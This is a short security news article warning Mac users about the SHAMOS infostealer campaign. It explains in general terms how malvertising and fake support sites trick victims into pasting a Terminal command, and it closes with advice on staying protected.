One Simple Copy-Paste in Terminal Can Hack Your Mac!

A Campaign Specifically Targeting macOS

Between June and August 2025, Crowdstrike monitored a series of attacks deploying SHAMOS, a variant of the Atomic macOS Stealer (AMOS) data thief. Distributed as a “malware-as-a-service” model, SHAMOS enables cybercriminals to harvest credentials, sensitive data, and cryptocurrencies.

Victims are lured by online advertisements or fake macOS support sites, which prompt them to copy and paste a Terminal command. As a result: more than 300 confirmed cases globally, including in France.

How Does the Attack Work?

The scenario is alarmingly simple:

• The user searches for a solution to a macOS issue (for example, “clear DNS cache”).
• They click on a well-ranked fraudulent site, promoted through malvertising.
• They are prompted to copy-paste a Terminal command. This command, sometimes hidden in Base64, downloads a script that captures the user’s password and installs SHAMOS. The malware bypasses Gatekeeper, collects data (passwords, notes, browser cookies, crypto wallets) and even deploys additional malicious payloads, like a fake Ledger Live.

It’s important to remember, Malvertising is a blend of “malicious” and “advertising”—a tactic used by cybercriminals to spread their attacks via online ads.

How to Protect Yourself?

A simple piece of advice: never run a Terminal script that you don’t understand. If the code contains encoded or obscure strings, that’s a red flag. This tactic is similar to the deceptive TikTok tutorials that trick users into copying and pasting incomprehensible lines.

To prevent disasters, installing security software on your Mac is essential: it blocks malware like SHAMOS, restricts access to compromised sites, and detects phishing attempts. This layer of protection can make a significant difference before your data or cryptocurrencies vanish.